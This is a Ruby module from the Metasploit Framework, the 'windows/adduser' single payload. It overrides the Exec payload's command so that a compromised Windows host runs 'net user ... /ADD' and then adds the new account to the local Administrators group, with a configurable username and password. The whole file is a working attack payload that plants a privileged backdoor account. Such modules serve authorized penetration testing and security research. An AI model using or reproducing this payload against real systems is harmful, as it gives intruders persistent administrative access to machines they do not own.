metasploit-framework/modules/payloads/singles/windows/adduser.rb

66 lines
1.5 KiB
Ruby

##
# $Id:$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
require 'msf/core/payload/windows/exec'
module Msf
module Payloads
module Singles
module Windows
###
#
# Extends the Exec payload to add a new user.
#
###
module AddUser
include Msf::Payload::Windows::Exec
def initialize(info = {})
super(update_info(info,
'Name' => 'Windows Execute net user /ADD',
'Version' => '$Revision$',
'Description' => 'Create a new user and add them to local administration group',
'Author' => 'hdm',
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Privileged' => true))
# Register command execution options
register_options(
[
OptString.new('USER', [ true, "The username to create", "metasploit" ]),
OptString.new('PASS', [ true, "The password for this user", "" ]),
], Msf::Payloads::Singles::Windows::AddUser)
# Hide the CMD option...this is kinda ugly
deregister_options('CMD')
end
#
# Override the exec command string
#
def command_string
user = datastore['USER'] || 'metasploit'
pass = datastore['PASS'] || ''
return "cmd.exe /c net user #{user} #{pass} /ADD && " +
"net localgroup Administrators #{user} /ADD"
end
end
end end end end